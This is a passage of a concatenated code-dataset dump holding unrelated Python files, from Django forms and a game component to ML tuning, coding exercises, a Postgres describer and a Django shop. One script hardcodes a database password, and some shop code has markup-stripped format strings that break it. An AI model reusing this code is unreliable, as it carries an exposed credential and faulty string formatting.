Meta:\n model = Configuration\n fields = (\n \"name\",\n \"address\",\n \"url\",\n \"language\",\n \"currency\",\n \"mail_from\",\n \"liability_interval\",\n )\n","sub_path":"src/byro/common/forms/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"165694543","text":"import configparser\nconfig = None\nconfig_file = 'config.ini'\n\ndef get_config(section, reload=False):\n global config\n global config_file\n if config is None or reload:\n loc_config = configparser.ConfigParser()\n loc_config.read(config_file)\n config = loc_config\n return config[section]\n","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"233904475","text":"import Zero\nimport Events\nimport Property\nimport VectorMath\nimport random\nVec3 = VectorMath.Vec3\n\nclass MouseLocationIndicator:\n Range = Property.Float(6.0)\n \n def Initialize(self, initializer):\n \n Zero.Connect(self.Space, Events.LogicUpdate, self.OnLogicUpdate)\n Zero.Connect(self.Space, Events.MouseUpdate, self.OnMouseUpdate)\n Zero.Connect(self.Space, Events.MouseUp, self.OnMouseUp)\n Zero.Connect(self.Space, Events.MouseDown, self.OnMouseDown)\n Zero.Connect(self.Space, Events.RightMouseUp, self.OnRightMouseUp)\n Zero.Connect(self.Space, Events.RightMouseDown, self.OnRightMouseDown)\n \n self.initial_size = self.Owner.Transform.Scale\n self.ball_size = self.Owner.SphereCollider.Radius\n \n self.hero = self.Space.FindObjectByName(\"Player\")\n self.Active = False\n self.TouchAttackable = False\n self.TouchGrowable = False\n self.WithInRange = False\n self.MousePos = Vec3(0,0,0)\n \n \n def OnLogicUpdate(self, UpdateEvent):\n self.UpdateEnvironmentInfo()\n if self.Active and 
self.WithInRange:\n self.PerformAbsorb()\n \n target_color = VectorMath.Vec4(1, 1, 1, 0.25)\n target_scale = 1\n if self.WithInRange:\n if self.TouchAttackable:\n target_color = VectorMath.Vec4(1, 0, 0, 0.25)\n target_scale = 5\n elif not self.TouchAnnihilator and self.TouchGrowable:\n target_color = VectorMath.Vec4(0, 1, 0, 0.25)\n target_scale = 5\n self.Owner.Sprite.Color = target_color\n self.Owner.Transform.Scale = self.initial_size * target_scale\n self.Owner.SphereCollider.Radius = self.ball_size / target_scale\n \n def PerformAbsorb(self):\n heroClickEvent = Zero.ScriptEvent()\n heroClickEvent.Target = self.hero\n self.Owner.Region.DispatchEvent(\"heroClickEvent\", heroClickEvent)\n \n def OnMouseUpdate(self, MouseUpdateEvent):\n self.MousePos = MouseUpdateEvent.ToWorldZPlane(0)\n self.Owner.Transform.Translation = self.MousePos\n \n def OnMouseDown(self, MouseDownEvent):\n self.Active = True\n \n def OnMouseUp(self, MouseUpEvent):\n self.Active = False\n \n def OnRightMouseDown(self, MouseDownEvent):\n if self.WithInRange and not self.TouchAnnihilator and self.TouchGrowable:\n self.hero.AbilityStatus.Perform(self.MousePos)\n \n def UpdateEnvironmentInfo(self):\n touched_objs = tuple(contactholder.OtherObject for contactholder in self.Owner.Collider.Contacts)\n self.TouchGrowable = any(tuple(obj.GrowableGround for obj in touched_objs))\n self.TouchAttackable = any(tuple(obj.ClickReceiver for obj in touched_objs))\n self.TouchAnnihilator = any(tuple(obj.PlantAnnihilator for obj in touched_objs))\n x2 = (self.MousePos.x - self.hero.Transform.Translation.x)**2\n y2 = (self.MousePos.y - self.hero.Transform.Translation.y)**2\n self.WithInRange = x2 + y2 < self.Range**2\n \n def OnRightMouseUp(self, MouseUpEvent):\n pass\n\nZero.RegisterComponent(\"MouseLocationIndicator\", MouseLocationIndicator)","sub_path":"prototypes/s_EngineProofDemo/Content/MouseLocationIndicator.py","file_name":"MouseLocationIndicator.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465441252","text":"import platform\nimport urllib.parse\nimport webbrowser\nfrom enum import Enum\n\nfrom .. import __api_version__, __version__\n\nGITHUB = 'https://github.com'\n\n\nclass Repositories(str, Enum):\n TINVEST = '/daxartio/tinvest'\n INVEST_OPENAPI = '/TinkoffCreditSystems/invest-openapi'\n\n\ndef create(repo: Repositories = Repositories.TINVEST):\n params = {\n 'body': (\n '## Expected Behavior\\n\\n\\n\\n'\n '## Actual Behavior\\n\\n\\n\\n'\n '## Steps to Reproduce the Problem\\n\\n'\n ' 1. \\n'\n ' 1. \\n'\n ' 1. 
\\n\\n'\n '## Specifications\\n\\n'\n f' - **[tinvest](/daxartio/tinvest/)** {__version__}\\n'\n ' - **[invest-openapi](/TinkoffCreditSystems/invest-openapi/)** '\n f'{__api_version__}\\n'\n f' - **platform** {platform.platform()}\\n'\n ),\n }\n\n query = urllib.parse.urlencode(params)\n url = f'{GITHUB}{repo}/issues/new?{query}'\n\n webbrowser.open(url, new=2)\n","sub_path":"tinvest/cli/issues.py","file_name":"issues.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380095137","text":"class Solution(object):\n \"\"\"docstring for Solution\"\"\"\n def maxDepth(self, root):\n if root is None:\n return 0\n maxLeft = self.maxDepth(root.left)\n maxRight = self.maxDepth(root.right)\n if maxRight > maxLeft:\n return (maxRight + 1)\n else:\n return (maxLeft + 1)\n","sub_path":"python/104MaximumDepthofBinaryTree.py","file_name":"104MaximumDepthofBinaryTree.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571835211","text":"# http://www.reddit.com/r/dailyprogrammer/comments/2lvgz6/20141110_challenge_188_easy_yyyymmdd/\n# Parse dates in a variety of formats, and return them in the iso 8601 standard format\n# (yyyy-mm-dd)\n\nimport re\n\ndef main(century=2000):\n\tpattern0 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t-\t\t\t\t\t# -\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t-\t\t\t\t\t# -\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern1 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t/\t\t\t\t\t# /\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t/\t\t\t\t\t# /\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern2 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t\\#\t\t\t\t\t# #\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t\\#\t\t\t\t\t# #\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern3 = re.compile(r\"\"\"\n\t\t^\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t\\*\t\t\t\t\t# *\n\t\t(\\d{2})\t\t\t\t# mm\n\t\t\\*\t\t\t\t\t# *\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t$\n\t\t\"\"\", re.VERBOSE)\n\tpattern4 = re.compile(r\"\"\"\n\t\t^\n\t\t([a-z]{3})\t\t\t# mmm (3-letter month word, e.g. \"Jan\", \"Feb\" etc)\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t,\t\t\t\t\t# ,\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# yy\n\t\t$\n\t\t\"\"\", re.VERBOSE | re.IGNORECASE)\n\tpattern5 = re.compile(r\"\"\"\n\t\t^\n\t\t([a-z]{3})\t\t\t# mmm (3-letter month word, e.g. \"Jan\", \"Feb\" etc)\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{2})\t\t\t\t# dd\n\t\t,\t\t\t\t\t# ,\n\t\t\\s\t\t\t\t\t#\n\t\t(\\d{4})\t\t\t\t# yyyy\n\t\t$\n\t\t\"\"\", re.VERBOSE | re.IGNORECASE)\n\n\tmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\tpatterns = [pattern0, pattern1, pattern2, pattern3, pattern4, pattern5]\n\torders = [(0, 1, 2), (2, 0, 1), (1, 0, 2), (2, 1, 0), (2, 0, 1), (2, 0, 1)]\n\tformated_dates = []\n\n\twith open(\"188 dates.txt\") as f:\n\t\tfor line in f:\n\n\t\t\traw = line.strip()\n\t\t\tfor num, pat in enumerate(patterns):\n\t\t\t\tsearch = re.search(pat, raw)\n\t\t\t\tif search:\n# Reorder things to go year, month, day\n\t\t\t\t\tdate = [search.groups()[orders[num][i]] for i in range(3)]\n\t\t\t\t\tbreak\n# If year is 2 digits (e.g. 14) change to 4 digits (e.g. 2014). Also we do dates in range\n# (century-50, century+49) e.g. 
in range (1950, 2049)\n\t\t\tif len(date[0]) == 2:\n\t\t\t\tif int(date[0]) < 50:\n\t\t\t\t\tdate[0] = str(century + int(date[0]))\n\t\t\t\telse:\n\t\t\t\t\tdate[0] = str(century - 100 + int(date[0]))\n# If month is a three letter month (e.g. \"Jan\") then change it to a number (e.g. 0)\n\t\t\tif date[1] in months:\n\t\t\t\tdate[1] = str(months.index(date[1]))\n\t\t\t\tif len(date[1]) == 1:\n\t\t\t\t\tdate[1] = \"0\" + date[1]\n\t\t\tformated_dates.append(date)\n\n\treturn formated_dates\n\nif __name__ == \"__main__\":\n\tdates = main()\n\tfor d in sorted(dates):\n\t\tprint(\"-\".join(d))","sub_path":"Challenge #188/yyyy-mm-dd.py","file_name":"yyyy-mm-dd.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2705522","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on June 2021\n\nBAYESIAN HYPERPARAMETER OPTIMIZATION\n\n@author: Nuria Gómez-Vargas\n\"\"\"\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # INFO and WARNING messages are not printed\nos.chdir(r'C:\\Users\\CdeC\\Desktop\\AI iGENTAC - Nuria\\algoritmo_final')\n\nimport GPyOpt\nimport tensorflow as tf\n\nfrom siamese_network import SiameseNetwork\n\n\ndef main():\n\n def bayesian_optimization_function(x):\n\n dataset_path = r'C:\\Users\\CdeC\\Desktop\\AI iGENTAC - Nuria\\datasets'\n batch_size = 25\n \n load_dataset_again = True\n\n use_augmentation = True\n params_augmentation = {}\n if use_augmentation:\n params_augmentation['prob_aug'] = 0.50\n params_augmentation['by_channel'] = False\n params_augmentation['affine_scale'] = (1.05,1.2)\n params_augmentation['affine_trans'] = (0.001, 0.10)\n params_augmentation['sum'] = (1,50)\n params_augmentation['alpha_contrast'] = (1,2)\n params_augmentation['gauss_loc'] = (-30,30)\n params_augmentation['gauss_scale'] = (0,50)\n params_augmentation['times'] = 1\n \n current_learning_rate = float(x[:, 0])\n current_momentum = float(x[:, 1])\n current_std_prob_threshold = float(x[:, 2])\n current_input_shape = (int(x[:, 3]), int(x[:, 3]) + 50, 3)\n\n model_name = 'lr_' + str(current_learning_rate) + '__momentum_' + str(current_momentum) + \\\n '__std_prob_threshold_' + str(current_std_prob_threshold) + '__input_shape_' + str(current_input_shape)\n tensorboard_log_path = './logs/bho_nuevo_neval3/' + model_name\n \n siamese_network = SiameseNetwork(\n dataset_path = dataset_path,\n process = 'train',\n load_dataset_again = load_dataset_again,\n batch_size = batch_size,\n learning_rate = current_learning_rate,\n momentum = current_momentum,\n use_augmentation = use_augmentation,\n dict_augment = params_augmentation,\n input_shape = current_input_shape,\n tensorboard_log_path = tensorboard_log_path,\n std_prob_threshold = current_std_prob_threshold,\n model_name = model_name)\n\n print(\"Training model: \", model_name, \"\\n\")\n\n number_of_train_iterations = 1500\n validate_each = 250\n \n validation_accuracy = siamese_network.train_siamese_network(number_of_iterations = number_of_train_iterations,\n validate_each = validate_each,\n model_name = model_name)\n\n # Once trained and validated, we make the predictions over the evaluation (test) set\n\n # Load the weights of the net, which are the ones with best validation accuracy\n siamese_network.model.load_weights('./models/'+model_name+'.h5')\n \n evaluation_accuracy, _, _ = siamese_network.predict_after_train()\n print(\"Model: \" + model_name + ' | Accuracy: ' + str(evaluation_accuracy), \"\\n\")\n\n return 1 - evaluation_accuracy\n\n\n 
hyperparameters = [{'name': 'learning_rate', 'type': 'continuous', 'domain': (10e-5, 10e-2)},\n {'name': 'momentum', 'type': 'continuous', 'domain': (0.0, 1.0)},\n {'name': 'std_prob_threshold', 'type': 'discrete', 'domain': (0.05, 0.25)},\n {'name': 'input_shape', 'type': 'discrete', 'domain': (75,100,200)}]\n\n optimizer = GPyOpt.methods.BayesianOptimization(f = bayesian_optimization_function,\n domain = hyperparameters)\n\n max_iter_for_run_optimization = 100\n\n optimizer.run_optimization(max_iter = max_iter_for_run_optimization)\n\n print(\"optimized parameters: {0}\".format(optimizer.x_opt))\n print(\"optimized eval_accuracy: {0}\".format(1 - optimizer.fx_opt))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bayesian_hyperparameter_optimization.py","file_name":"bayesian_hyperparameter_optimization.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495809122","text":"class Solution:\r\n\r\n #Function to find the smallest positive number missing from the array.\r\n def missingNumber(self, arr, n):\r\n arr.sort()\r\n i = 1\r\n for j in range(n):\r\n if arr[j] == i:\r\n i += 1\r\n if arr[j] >= i:\r\n return i\r\n return i\r\n\r\n\r\n#{\r\n# Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\nimport math\r\n\r\n\r\ndef main():\r\n T = int(input())\r\n while (T > 0):\r\n\r\n n = int(input())\r\n\r\n arr = [int(x) for x in input().strip().split()]\r\n\r\n ob = Solution()\r\n print(ob.missingNumber(arr, n))\r\n\r\n T -= 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n# } Driver Code Ends","sub_path":"Smallest_Positive_Missing_GFG.py","file_name":"Smallest_Positive_Missing_GFG.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473800893","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\n\nconn = psycopg2.connect(dbname=\"\", user=\"hud_admin\", password=\"eRqg123EEkl\")\ncur = conn.cursor()\n\n# Get table mapping type_code and type_name\ncur.execute(\"SELECT oid, typname FROM pg_catalog.pg_type\")\ntype_mappings = {\n int(oid): typename\n for oid, typename in cur.fetchall()\n}\n\n# Get table names\ncur.execute(\"SELECT table_name FROM information_schema.tables WHERE table_schema='public'\")\ntable_names = cur.fetchall()\n\n# Get readable description of the tables\nreadable_description = {}\nfor table in table_names:\n statement = cur.mogrify(\"SELECT * FROM %s LIMIT 0\", (AsIs(table), ))\n cur.execute(statement)\n readable_description[table] = {\n \"columns\": [\n {\n \"name\": col.name,\n \"type\": type_mappings[col.type_code],\n \"internal_size\": col.internal_size\n }\n for col in cur.description\n ]\n }\n\n# Add row count\nfor table in readable_description.keys():\n cur.execute(\"SELECT COUNT(*) FROM %s\", (AsIs(table), ))\n row_count = cur.fetchone()\n readable_description[table][\"total\"] = row_count\n\n# Add sample rows\nfor table in readable_description.keys():\n cur.execute(\"SELECT * FROM %s LIMIT 100\", (AsIs(table), ))\n readable_description[table][\"sample_rows\"] = cur.fetchall()\n\nprint(readable_description)\n","sub_path":"description-table.py","file_name":"description-table.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483142900","text":"\nnumber = input(\"Give me a whole number below 12 \")\n\nvalid = False\n\nwhile valid != True:\n try:\n 
number = int(number)\n valid = True\n except:\n number = input(\"Give me a whole number below 12 \")\n \nnumber2 = number\n \nwhile number2 <= number:\n print(str(number) + \"x\" + str(number2) + \"=\" + str(number * number2))\n number2 -= 1\n\n if number2 < 0:\n break\n\n \n","sub_path":"loops-try.py","file_name":"loops-try.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"90192202","text":"# !/usr/bin/env python\n# -*- coding utf-8-*-\n\n'''\nr,只能读。 【**】\nw,只能写,写之前清空。 【**】\na,只能追加。【*】\nr+ 读:默认从0的光标开始读,也可以通过 seek 调整光标的为位置。\n 写:从光标所在的位置开始写,也可以通过 seek 调整光标的位置。\nw+ 读:默认光标永远在写入的最后或0,也可以通过 seek 调整光标的位置。\n 写:先清空。\na+ 读:默认光标在最后,也可以通过 seek 调整光标的位置。然后再去读取。\n 写:永远写到最后。\n\n'''\n\n# 打开文件(r(写);w(重写);a(添加);r+(从光标位置开始写入);w+;a+)\nfile_object = open('log.txt', mode='r', encoding='utf-8')\n\n\n# 读取内容\ncontent = file_object.read()\nprint(content)\n\n# 关闭文件\nfile_object.close()","sub_path":"day07/文件操作.py","file_name":"文件操作.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167505213","text":"def parse_current(self, response):\n # define selector that contains all items\n all_people = response.css(\"li.grid-listing__item\")\n print(all_people)\n # iterate through items\n for person in all_people:\n # manually parse name\n name = person.css(\"a>div>h2::text\").get()\n # manually parse title\n title = person.css(\"a>div>p::text\").get()\n\n now = datetime.datetime.now()\n year = now.year\n\n # Return item\n yield self.create_board(name,title,year)","sub_path":"ManWebScraper/AST/similarity/GSK/GSK_current.py","file_name":"GSK_current.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638443652","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport vizdoomlearning as vl\n\nhelper = vl.Helper()\n\n\nclass ActorCriticNetwork:\n def __init__(self, screen_size, action_size, scope, trainer):\n with tf._variable_scope(scope):\n # Input and visual encoding layers\n\n self.inputs = tf.placeholder(shape=[None, screen_size], dtype=tf.float32)\n self.image_input = tf.reshape(self.inputs, shape=[-1, 84, 84, 1])\n self.conv1 = slim.conv2d(self.image_input,\n num_outputs=16,\n kernel_size=[8, 8],\n stride=[4, 4],\n padding='VALID',\n activation_fn=tf.nn.elu)\n self.conv2 = slim.conv2d(self.conv1,\n num_outputs=32,\n kernel_size=[4, 4],\n stride=[2, 2],\n padding='VALID',\n activation_fn=tf.nn.elu)\n hidden_layer = slim.fully_connected(slim.flatten(\n self.conv2),\n 256,\n activation_fn=tf.nn.elu)\n\n # Recurrent network for temporal dependencies\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(256, state_is_tuple=True)\n c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)\n h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)\n self.init_state = [c_init, h_init]\n c_input = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])\n h_input = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])\n self.state_input = (c_input, h_input)\n rnn_input = tf.expand_dims(hidden_layer, [0])\n step_size = tf.shape(self.image_input)[:1]\n lstm_state_input = tf.contrib.rnn.LSTMStateTuple(c_input, h_input)\n lstm_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell,\n rnn_input,\n sequence_length=step_size,\n initial_state=lstm_state_input,\n time_major=False)\n lstm_c, lstm_h = lstm_state\n 
self.state_output = (lstm_c[:1, :], lstm_h[:1, :])\n rnn_output = tf.reshape(lstm_output, [-1, 256])\n\n #Output layers for policy and value estimations\n self.policy = slim.fully_connected(rnn_output,\n action_size,\n activation_fn=tf.nn.softmax,\n weights_initializer=helper.normalized_columns_initializer(0.01),\n biases_initializer=None)","sub_path":"python/neuralnetwork/vizdoomlearning/ActorCriticNetwork.py","file_name":"ActorCriticNetwork.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649197658","text":"#問16 整列によって元のデータがどこに移ったか求める\n\ndef simplesort(a):\n #インデックスの配列を作る\n index = [i for i in range(len(a))]\n for i in range(len(a)):\n min = i\n for j in range(i+1,len(a)):\n if a[j] < a[min]:\n min = j\n a[i],a[min] = a[min],a[i]\n #aの要素を入れ替えると同時に,index配列の要素も入れ替える\n index[i],index[min] = index[min], index[i]\n return index\n\n#資料の例で確かめる\ndef test():\n a = [2,2,1,1]\n print(simplesort(a) == [2,3,0,1])\n\ntest()\n","sub_path":"第三回/Q16.py","file_name":"Q16.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601549445","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom math import ceil\nfrom collections import OrderedDict\n\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.template.context import RequestContext\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.safestring import mark_safe\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template.loader import render_to_string\nfrom django.contrib.auth.models import User\nfrom django.forms.widgets import RadioFieldRenderer\nfrom django.utils import timezone\n\nfrom primus.base.views import BaseListView, check_categories_url\nfrom primus.base.fields import NoRenderInput\nfrom primus.base.templatetags import calc\n\nfrom primus_payment.forms import BasePayableOrderForm\n\nfrom shop.models import *\nfrom shop.iqsms import IQSMS\n\n\nclass MinMaxWidget(forms.MultiWidget):\n def __init__(self, *args, **kwargs):\n widgets = (forms.TextInput, forms.TextInput)\n super(MinMaxWidget, self).__init__(widgets, *args, **kwargs)\n for w in self.widgets:\n w.attrs['size'] = 7\n\n def render(self, *args, **kwargs):\n return mark_safe(u'

%s от %s до %s
    ' % (super(MinMaxWidget, self).render(*args, **kwargs), int(self.limits[0] or 0), int(self.limits[1] or 100)))\n\n def format_output(self, widgets):\n # FIXME: use labels\n return u'от %s до %s' % (widgets[0], widgets[1])\n\nclass MinMaxField(forms.MultiValueField):\n def compress(self, dl):\n return dl\n \n def __init__(self, limits, *args, **kwargs):\n fields = (forms.IntegerField(min_value=0, required=False), forms.IntegerField(min_value=0, required=False))\n super(MinMaxField, self).__init__(fields, widget=MinMaxWidget, *args, **kwargs)\n self.widget.limits = limits\n\n def clean_(self, value):\n value = super(MinMaxField, self).clean(value)\n try:\n if int(value[0]) > int(value[1]):\n raise forms.ValidationError(_(u'Минимальный предел больше максимального'))\n except ValueError:\n pass\n return value\n\nclass FilterForm(forms.Form):\n text = forms.CharField(required=False, label=_(u'Поиск по названию'))\n\n def __init__(self, cat, items, *args, **kwargs):\n if 'label_suffix' not in kwargs:\n kwargs['label_suffix'] = ''\n self.cat = cat\n self.items = items\n price_limits = items.aggregate(vmin=models.Min('price'), vmax=models.Max('price'))\n \n super(FilterForm, self).__init__(*args, **kwargs)\n\n self.fields = OrderedDict(\n self.fields.items()[:1]\n + [('price', MinMaxField(limits=(price_limits['vmin'], price_limits['vmax']), label=_(u'Цена'), required=False))]\n + self.fields.items()[1:]\n )\n\n def filter_items(self):\n kwargs = {}\n if self.cleaned_data.get('price'):\n pmin, pmax = self.cleaned_data['price']\n if pmin:\n kwargs['price__gte'] = pmin \n if pmax:\n kwargs['price__lte'] = pmax \n\n # search by text\n if self.cleaned_data.get('text'):\n found_ids = {}\n for word in re_split_words.findall(self.cleaned_data.get('text', '').lower()):\n results = SearchWord.objects.filter(key=word)\n if results:\n found_ids[word] = set(reduce(lambda x,y: x+y, map(lambda x:x.values.split('|'), results)))\n\n if found_ids.values():\n ids = reduce(lambda x,y:x.intersection(y), found_ids.values())\n kwargs['id__in'] = ids\n else:\n self.items = self.items.none()\n return self.items.filter(**kwargs)\n\n\nclass HTMLRadioInput(forms.RadioSelect):\n def __unicode__(self):\n from django.utils.encoding import force_unicode\n if 'id' in self.attrs:\n label_for = ' for=\"%s_%s\"' % (self.attrs['id'], self.index)\n else:\n label_for = ''\n choice_label = force_unicode(self.choice_label)\n return mark_safe(u'%s %s' % (label_for, self.tag(), choice_label))\n\n\nclass HTMLRadioFieldRenderer(RadioFieldRenderer):\n def __iter__(self):\n for i, choice in enumerate(self.choices):\n yield HTMLRadioInput(self.name, self.value, self.attrs.copy(), choice, i)\n\n def __getitem__(self, idx):\n choice = self.choices[idx] # Let the IndexError propogate\n return HTMLRadioInput(self.name, self.value, self.attrs.copy(), choice, idx)\n\n\nclass OrderForm(forms.ModelForm):\n done = forms.BooleanField(widget=NoRenderInput, required=False)\n \n class Meta:\n model = Order\n fields = ('contact', 'fio', 'phone', 'email', 'delivery', 'country', 'city', 'post_index', 'address', 'requisites', 'comment')\n\n def __init__(self, location, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n if location and location.metro_stations:\n choices = [('', '--------')] + [(i, i) for i in location.metro_stations.splitlines() if i.strip()]\n self.fields = OrderedDict(\n self.fields.items()[:5]\n + [('metro_station', forms.ChoiceField(choices,\n label=Order._meta.get_field('metro_station').verbose_name,\n 
required=False))]\n                + self.fields.items()[5:]\n            )\n        delivery_choices = []\n        for k, v in DELIVERY_METHODS:\n            if (self.instance.ws and v.value5) or (not self.instance.ws and v.value4):\n                delivery_choices.append((k, mark_safe(u'%s %s
    ' % (v, v.value))))\n if self.instance.ws:\n choices = delivery_choices\n else:\n choices = []\n if location and location.delivery_methods:\n for k,v in delivery_choices:\n if k in map(int, location.delivery_methods.split(',')):\n choices.append((k,v))\n else:\n for k,v in delivery_choices:\n if k in (1,4):\n choices.append((k,v))\n self.fields['delivery'].choices = choices\n self.fields['delivery'].widget = forms.RadioSelect(choices=choices, renderer=HTMLRadioFieldRenderer)\n self.fields['delivery'].required = True\n self.fields['fio'].help_text = u'Как к Вам обращаться'\n self.fields['phone'].help_text = u'Для уточнения данных по доставке'\n self.fields['email'].help_text = u'Куда выслать информацию по заказу'\n\n\n def save(self, request):\n obj = super(OrderForm, self).save(commit=False)\n obj.metro_station = self.cleaned_data.get('metro_station', '')\n obj.location = request.SHOP_LOCATION or None\n obj.status = 1 #!!!!!!!!!!!!!\n obj.save()\n self.save_m2m()\n return obj\n \n def as_table(self):\n return self._html_output(\n normal_row = u'%(label)s%(errors)s%(field)s%(help_text)s',\n error_row = u'%s',\n row_ender = u'',\n help_text_html = u'%s',\n errors_on_separate_row = False)\n\n def clean_phone(self):\n phone = self.cleaned_data.get('phone')\n if not phone:\n raise forms.ValidationError(u'Обязательное поле')\n return phone\n\n def clean_delivery(self):\n delivery = self.cleaned_data.get('delivery')\n if not delivery:\n raise forms.ValidationError(u'Обязательное поле')\n return delivery\n \n def clean_payment(self):\n payment = self.cleaned_data.get('payment')\n if not payment:\n raise forms.ValidationError(u'Обязательное поле')\n\n delivery = self.cleaned_data.get('delivery')\n if delivery and not payment in dict(DELIVERY_METHODS)[delivery].value2:\n raise forms.ValidationError(u'При данном способе доставки этот способ оплаты недоступен')\n return payment\n \n def send(self):\n from django.core.mail import send_mail\n obj = self.instance\n obj.status = 1 #!!!!!!!!!!!!!!!!\n obj.save()\n obj.orderitem_set.filter(count=0).delete()\n \n #send_mail(u'King Bong: %s' % obj, \n # render_to_response('shop/mail/new_order_notification.txt', {'order': obj}),\n # u'King Bong ',\n # settings.SHOP_NOTIFICATIONS, \n # fail_silently=True)\n \n def clean_post_index(self):\n if self.cleaned_data.get('delivery') == 1 and not self.cleaned_data.get('post_index'):\n raise forms.ValidationError(u'Укажите почтовый индекс')\n return self.cleaned_data.get('post_index')\n \n def clean(self):\n if self.instance.ws and self.instance.price < settings.MIN_ORDER_PRICE_WS:\n raise forms.ValidationError(u'Извините, минимальный оптовый заказ — %s рублей' % settings.MIN_ORDER_PRICE_WS)\n if not self.instance.ws and self.instance.price-self.instance.delivery_price < settings.MIN_ORDER_PRICE:\n raise forms.ValidationError(u'Извините, минимальный заказ — %s рублей' % settings.MIN_ORDER_PRICE)\n return self.cleaned_data\n \n \nclass OIForm(forms.ModelForm):\n class Meta:\n model = OrderItem\n exclude = ('item',)\n\n def __init__(self, *args, **kwargs):\n super(OIForm, self).__init__(*args, **kwargs)\n self.fields['count'].widget.attrs.update({'size': 3, 'maxlength': 3, 'min': 1, 'step': 1, 'max': 999})\n\nclass OIFormSet(forms.models.BaseModelFormSet):\n class Meta:\n model = OrderItem\n \n def as_table(self):\n return render_to_string('shop/basket_form.html', { \n 'forms':self.forms,\n 'request': self.request,\n })\n\n def get_ajax_update(self, oi_id):\n from primus.base.templatetags.calc import intspace\n\n 
try:\n order = Order.objects.get(orderitem__id=oi_id)\n except Order.DoesNotExist: # order is already deleted? Tampered data?\n return ''\n \n out = {'basket_inclusion': render_to_response('shop/basket_inclusion.html', {'order': order}).content,\n 'sum': intspace(order.price),\n 'delivery': order.delivery_price,\n 'weight': order.weight\n }\n \n if oi_id:\n try:\n oi = self.queryset.get(id=oi_id)\n except OrderItem.DoesNotExist:\n return ''\n \n out.update({'row': intspace(oi.price),\n 'row_weight': oi.weight})\n return json.dumps(out)\n\nclass KBLoginForm(AuthenticationForm):\n \n def __init__(self, *args, **kwargs):\n super(KBLoginForm, self).__init__(*args, **kwargs)\n self.fields['username'].label = u'Телефон'\n self.fields['username'].help_text = kb_username_description\n\nclass KBRegisterForm(forms.ModelForm):\n username = forms.CharField(label=u'Телефон', max_length=30, required=True, 